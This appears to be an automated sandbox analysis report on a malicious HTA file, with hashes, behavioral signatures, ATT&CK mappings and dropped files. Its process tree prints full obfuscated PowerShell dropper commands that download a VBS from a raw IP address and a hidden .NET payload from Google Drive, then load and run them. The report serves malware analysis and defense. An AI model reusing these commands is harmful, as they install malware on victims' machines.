706e2d312d3693ccd38e6b489e13e12db863b723865f7f05580bcdc1c779a342

Analysis

max time kernel
120s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
05-11-2024 07:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bestgreetingwithbestthingsevermadewithgreatthigns.hta
Size

206KB
MD5

64d1fd56bfbbb3698a9550ea63759364
SHA1

dcb935d539fa987f85bdda8bf43ac3d2f368df13
SHA256

706e2d312d3693ccd38e6b489e13e12db863b723865f7f05580bcdc1c779a342
SHA512

906a7a5df0c4891a3a89abc253a494efbb382e2a75f035b3aabc6cdac94f9b09324f370e326b12edd461f21a889d41c041bd44131c334e0b2b395ff813fc1e93
SSDEEP

48:4FhWsTR/F7gNqXfDx4l0i2F4B0i2Nq87ONSK4EkcdQ03+ljAymG987n1adW4yV4u:43F97/OlLBgTK9Q03+ljNAolv2lq/Q

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

exe.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

PoWERshElL.ExEpowershell.exe

flow pid process

4 2300 PoWERshElL.ExE
6 2260 powershell.exe
8 2260 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2736 powershell.exe
2260 powershell.exe
Evasion via Device Credential Deployment 2 IoCs
defense_evasion execution

Processes:

PoWERshElL.ExEpowershell.exe

pid process

2300 PoWERshElL.ExE
2080 powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

5 drive.google.com
6 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	pid	process
4	2300	PoWERshElL.ExE
6	2260	powershell.exe
8	2260	powershell.exe

pid	process
2736	powershell.exe
2260	powershell.exe

pid	process
2300	PoWERshElL.ExE
2080	powershell.exe

flow	ioc
5	drive.google.com
6	drive.google.com

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

WScript.exepowershell.exepowershell.exemshta.exePoWERshElL.ExEpowershell.execsc.execvtres.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PoWERshElL.ExE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

PoWERshElL.ExEpowershell.exepowershell.exepowershell.exe

pid process

2300 PoWERshElL.ExE
2080 powershell.exe
2300 PoWERshElL.ExE
2300 PoWERshElL.ExE
2736 powershell.exe
2260 powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
2300	PoWERshElL.ExE
2080	powershell.exe
2300	PoWERshElL.ExE
2300	PoWERshElL.ExE
2736	powershell.exe
2260	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

PoWERshElL.ExEpowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2300	PoWERshElL.ExE
Token: SeDebugPrivilege	2080	powershell.exe
Token: SeDebugPrivilege	2736	powershell.exe
Token: SeDebugPrivilege	2260	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

mshta.exePoWERshElL.ExEcsc.exeWScript.exepowershell.exe

description	pid	process	target process
PID 1916 wrote to memory of 2300	1916	mshta.exe	PoWERshElL.ExE
PID 1916 wrote to memory of 2300	1916	mshta.exe	PoWERshElL.ExE
PID 1916 wrote to memory of 2300	1916	mshta.exe	PoWERshElL.ExE
PID 1916 wrote to memory of 2300	1916	mshta.exe	PoWERshElL.ExE
PID 2300 wrote to memory of 2080	2300	PoWERshElL.ExE	powershell.exe
PID 2300 wrote to memory of 2080	2300	PoWERshElL.ExE	powershell.exe
PID 2300 wrote to memory of 2080	2300	PoWERshElL.ExE	powershell.exe
PID 2300 wrote to memory of 2080	2300	PoWERshElL.ExE	powershell.exe
PID 2300 wrote to memory of 2772	2300	PoWERshElL.ExE	csc.exe
PID 2300 wrote to memory of 2772	2300	PoWERshElL.ExE	csc.exe
PID 2300 wrote to memory of 2772	2300	PoWERshElL.ExE	csc.exe
PID 2300 wrote to memory of 2772	2300	PoWERshElL.ExE	csc.exe
PID 2772 wrote to memory of 2368	2772	csc.exe	cvtres.exe
PID 2772 wrote to memory of 2368	2772	csc.exe	cvtres.exe
PID 2772 wrote to memory of 2368	2772	csc.exe	cvtres.exe
PID 2772 wrote to memory of 2368	2772	csc.exe	cvtres.exe
PID 2300 wrote to memory of 2636	2300	PoWERshElL.ExE	WScript.exe
PID 2300 wrote to memory of 2636	2300	PoWERshElL.ExE	WScript.exe
PID 2300 wrote to memory of 2636	2300	PoWERshElL.ExE	WScript.exe
PID 2300 wrote to memory of 2636	2300	PoWERshElL.ExE	WScript.exe
PID 2636 wrote to memory of 2736	2636	WScript.exe	powershell.exe
PID 2636 wrote to memory of 2736	2636	WScript.exe	powershell.exe
PID 2636 wrote to memory of 2736	2636	WScript.exe	powershell.exe
PID 2636 wrote to memory of 2736	2636	WScript.exe	powershell.exe
PID 2736 wrote to memory of 2260	2736	powershell.exe	powershell.exe
PID 2736 wrote to memory of 2260	2736	powershell.exe	powershell.exe
PID 2736 wrote to memory of 2260	2736	powershell.exe	powershell.exe
PID 2736 wrote to memory of 2260	2736	powershell.exe	powershell.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\bestgreetingwithbestthingsevermadewithgreatthigns.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1916
- C:\Windows\SysWOW64\WINdOwSpoweRSheLL\V1.0\PoWERshElL.ExE
  "C:\Windows\SYStEM32\WINdOwSpoweRSheLL\V1.0\PoWERshElL.ExE" "PowErShEll -Ex BYPaSS -NOP -W 1 -C dEVIcEcrEDEnTIAlDePlOYmENt.EXe ; iex($(iEX('[SYsTeM.TeXt.EnCoding]'+[chAr]0X3A+[CHAr]0X3A+'uTf8.geTSTring([SYstem.ConVERT]'+[chAR]58+[CHAR]58+'fRoMBASE64string('+[CHar]0X22+'JGVhNmM4bXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlckRlZmluSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OLmRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENmbXIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYVV2eVZCUkQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZmWWxEb2wsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb0ZYckloKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiU3V4dFBJQkp4bCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbklZcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZWE2YzhtclQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjcuNTIvMzUvcGljdHVyZXdpdGhhdHRpdHVkZWV2ZW5iZXR0ZXJmb3JhbGx0aGluZ3MudElGIiwiJGVOdjpBUFBEQVRBXHBpY3R1cmV3aXRoYXR0aXR1ZGVldmVuYmV0dGVyZm9yYWxsdGhpbi52YnMiLDAsMCk7U1RBUnQtc2xlZVAoMyk7c3RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoYXR0aXR1ZGVldmVuYmV0dGVyZm9yYWxsdGhpbi52YnMi'+[cHar]0X22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2300
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSS -NOP -W 1 -C dEVIcEcrEDEnTIAlDePlOYmENt.EXe
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2080
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i1y4v0de.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2772
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB626.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB625.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2368
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\picturewithattitudeevenbetterforallthin.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2636
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdpWEtpbScrJ2FnJysnZVVybCA9IE5RMGh0dHBzOi8vZHJpdmUuZ29vZ2xlJysnLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MVV5SHF3cm5YQ2xLQkozajYzTGwxdDJTdFZnR3hiU3QwIE5RMDtpWEt3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5Jysnc3RlbS5OZXQuVycrJ2ViQ2xpZW50O2lYSycrJ2ltYWdlQnl0ZXMgPSBpWCcrJ0t3ZWJDbGllbnQuRG93bmxvYWREYXRhKGlYS2ltYWdlVXJsKTtpWEtpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW4nKydjb2RpbmddOjonKydVVEY4LkdldFN0cmluZyhpWEtpbWFnZUJ5dGVzKTtpWEtzdGFydEZsYWcgPSBOUTA8PEJBU0U2NF9TVEFSVD4+TlEwO2lYS2VuZEZsYWcgPSBOUTA8PEJBU0U2NF9FTkQ+Pk5RMDtpWEtzdGFydEluZGV4ID0gaVhLaW1hZ2VUZXh0LkluZGV4T2YoaVhLc3RhcnRGbGFnKTtpWEtlbmRJbmRleCA9IGlYS2ltYWdlVGV4dC5JbmRleE9mKGlYS2VuZEZsYWcpO2lYS3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBpWEtlbmQnKydJbmRleCAtZ3QgaVhLc3RhcnRJbmRleDtpWEtzdGFydEluZGV4ICs9IGlYS3N0YXJ0RmxhZycrJy5MZW5ndGg7aVhLYmFzZTY0TGVuZ3RoID0gaVhLZW5kSW5kZXgnKycgLSBpWEtzdGFydEluJysnZGV4O2lYS2Jhc2U2NENvbW1hbmQgPSBpWEtpbWFnZVRleHQuU3Vic3RyaW4nKydnKGlYS3N0JysnYXJ0SW5kZXgsJysnIGlYS2Jhc2U2NExlbmd0aCk7aVhLYmFzZTY0UmV2ZXJzZWQgPSAtam8nKydpbiAoaVhLYmEnKydzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIDJDUSBGb3JFYWNoLU9iamVjdCB7IGlYS18gfSlbLTEuLi0oaVhLYmFzZTY0Q28nKydtbWFuZC5MZW5ndGgpXTtpWEtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvJysnbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKGlYS2Jhc2U2NFJldmVyc2VkKTtpWEtsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoaVhLY29tbWFuZEJ5dGVzKTtpWEt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKE5RMFZBSU5RMCk7aVhLdmFpTWV0aG9kLkknKydudm9rZShpWEtudWxsLCBAKE5RMHR4dC5VTExQTVMvNTMvMjUuNy44NjEuNDAxLy86cHR0aE5RMCwgTlEwZGVzYXRpdmFkb05RMCwgTlEwZGVzYXRpdmFkbycrJ05RMCwgTlEwZGVzYXRpdmFkb05RMCwgTlEwYXNwbmV0X3JlZ2Jyb3dzZXJzTlEwLCBOUTBkZXNhdGl2YWRvTlEwLCBOUScrJzBkZXNhdGl2YWRvTlEwLE5RMGRlc2F0aXZhZG9OUTAsTlEwZGVzYXRpdmFkb05RMCxOUTBkZXNhdGl2YScrJ2RvTlEwLE5RMGRlc2F0aXZhZG9OUTAsTlEwZGVzYXQnKydpdmFkb05RMCxOUTAxTlEwLE5RMGRlc2F0aXZhZG9OUTApKTsnKS5SRVBsYWNlKCcyQ1EnLCd8JykuUkVQbGFjZSgnaVhLJyxbc1RyaU5nXVtjaGFyXTM2KS5SRVBsYWNlKChbY2hhcl03OCtbY2hhcl04MStbY2hhcl00OCksW3NUcmlOZ11bY2hhcl0zOSkgfCAuICggJHNoRWxMSURbMV0rJHNIZUxsaURbMTNdKydYJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2736
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('iXKim'+'ag'+'eUrl = NQ0https://drive.google'+'.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 NQ0;iXKwebClient = New-Object Sy'+'stem.Net.W'+'ebClient;iXK'+'imageBytes = iX'+'KwebClient.DownloadData(iXKimageUrl);iXKimageText = [System.Text.En'+'coding]::'+'UTF8.GetString(iXKimageBytes);iXKstartFlag = NQ0<<BASE64_START>>NQ0;iXKendFlag = NQ0<<BASE64_END>>NQ0;iXKstartIndex = iXKimageText.IndexOf(iXKstartFlag);iXKendIndex = iXKimageText.IndexOf(iXKendFlag);iXKstartIndex -ge 0 -and iXKend'+'Index -gt iXKstartIndex;iXKstartIndex += iXKstartFlag'+'.Length;iXKbase64Length = iXKendIndex'+' - iXKstartIn'+'dex;iXKbase64Command = iXKimageText.Substrin'+'g(iXKst'+'artIndex,'+' iXKbase64Length);iXKbase64Reversed = -jo'+'in (iXKba'+'se64Command.ToCharArray() 2CQ ForEach-Object { iXK_ })[-1..-(iXKbase64Co'+'mmand.Length)];iXKcommandBytes = [System.Co'+'nvert]::FromBase64String(iXKbase64Reversed);iXKloadedAssembly = [System.Reflection.Assembly]::Load(iXKcommandBytes);iXKvaiMethod = [dnlib.IO.Home].GetMethod(NQ0VAINQ0);iXKvaiMethod.I'+'nvoke(iXKnull, @(NQ0txt.ULLPMS/53/25.7.861.401//:ptthNQ0, NQ0desativadoNQ0, NQ0desativado'+'NQ0, NQ0desativadoNQ0, NQ0aspnet_regbrowsersNQ0, NQ0desativadoNQ0, NQ'+'0desativadoNQ0,NQ0desativadoNQ0,NQ0desativadoNQ0,NQ0desativa'+'doNQ0,NQ0desativadoNQ0,NQ0desat'+'ivadoNQ0,NQ01NQ0,NQ0desativadoNQ0));').REPlace('2CQ','|').REPlace('iXK',[sTriNg][char]36).REPlace(([char]78+[char]81+[char]48),[sTriNg][char]39) | . ( $shElLID[1]+$sHeLliD[13]+'X')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2260

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESB626.tmp

Filesize
1KB

MD5
a1163b669d979411e753e4662427745a

SHA1
3a88f7c8405ebbaeed1bc563e396d0807ae6a956

SHA256
571d5cc655ec1d6673e01064c3f37bbf16884e6629c6b31c61dc79293f4151db

SHA512
9e705b05874d07880f00cf279991ac5e944918a5653a3998021185a5284e78a0c4999a98b85b37d3864eb0200f6e5accf7549b57afa75fa209048b8914ada0fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\i1y4v0de.dll

Filesize
3KB

MD5
b6eb2097cb60320d4a8e9bb31578ec3e

SHA1
5f6314e1911cc44e9e85cc4da58f2d282b5c5b2b

SHA256
92c5e00b41dcee69bf3144c5930b3e23c08291e4c43ae2f9eea374ea44ac9a23

SHA512
9791d50044b36a06a5fd9f3d7f9106c13726eaece371d822f3d82e811bc70a5f35c044031a982e8bfc5adee1331192f5028336b81c21d612f9d9e99c611d1bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\i1y4v0de.pdb

Filesize
7KB

MD5
026ea8634777287b2e7a212af8a091ba

SHA1
120e2d73ce6857a1942450420d88968d70993dc6

SHA256
dd564450a3bfb3c358db255490e3950b70ecbc1f19f211be6a784b9f3f3d3a4f

SHA512
062ceffb853a2c10380835798032694bfa5dca67498184c11a555a02ac63a25e2e343dc1fa13430b315c5280d7c547a67473f8256db0e9b420142ce58b2976b2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
9c5845ffd7f95d0f63b1d01400479c1f

SHA1
13fcc1e7244f07e36cdc33fe17dcd7105f8f54d5

SHA256
1ed678f5a33a043bfe654391eed0335d05d238213d45ddff8f0c3929ac34dc33

SHA512
7ea321038aaf2c3eb9c19cc7a0d9cd0e534dd8f0ba376556df40ed0f555fba5ebf0f1806991a0c508927c4d0ed86f5d4166265048b6855915c9825d3d386c99d

Download Submit
C:\Users\Admin\AppData\Roaming\picturewithattitudeevenbetterforallthin.vbs

Filesize
137KB

MD5
8575080d678736f4370fa4b88d00c148

SHA1
ec4023c9d47d5d4c93e1f76d6400c6dfbec3a143

SHA256
521c52c7c4e3e15c8d9805eeb75b45c85679c7ac9e744d9f53d67a7840cf309f

SHA512
3b3e106f9ff3f57a41ca101e179c373e0782a1d5a82a113ee72b993893c4f5ad615d075631904ee3ab417f4b7f10062f15153280b159623ad8b0f71d49073593

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCB625.tmp

Filesize
652B

MD5
9d2beb82d77a91126da0307d4547c802

SHA1
ea90957562a3563161aea17d8cc267cbacdda202

SHA256
8a772f3dd27af6a45a2ffcb729fed284c734c54ac1a347651c52281d7ef8e67c

SHA512
af61d22af405150b860dddb681f587d0bbead9a610aed752be5dbb54d13d5260a7d811e444365f986a51a393a07b22276bc1eefda1c3799b2ac405286ace11f4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\i1y4v0de.0.cs

Filesize
478B

MD5
3da4ad222b76364bbe83d07f6bbf5f06

SHA1
6b4be35e25435be0f75e9db059c91e3a230e81d7

SHA256
1cf28334727114e790315d7a9bbc1b3512b68694b50dad3b8fcf402ff3a7eee6

SHA512
4585510bc72ffd7635f53505edb14082520781df4a9f58be5d090190e76663a9254f1fe2eff5471b5703df98acc58890dc87d6ff2542edc136c96f521c5409fd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\i1y4v0de.cmdline

Filesize
309B

MD5
7aecb391edaa2df0fdf249a0dbe90717

SHA1
2ea6aa29beb6b5498385f27a75641c583be995dd

SHA256
6d4a6a42f04e3164c90c98f7a2e4bae149a45a2b7f22ebab2d5a3dc9c4409e9f

SHA512
1145e83cd17095064e63895ca4c60f48fa105ca9ff3ab4bfa97747328ae37ebde5d77426659aefcc664ff998eedc24d9de8a4720110ed287826d35e037b9594d

Download Submit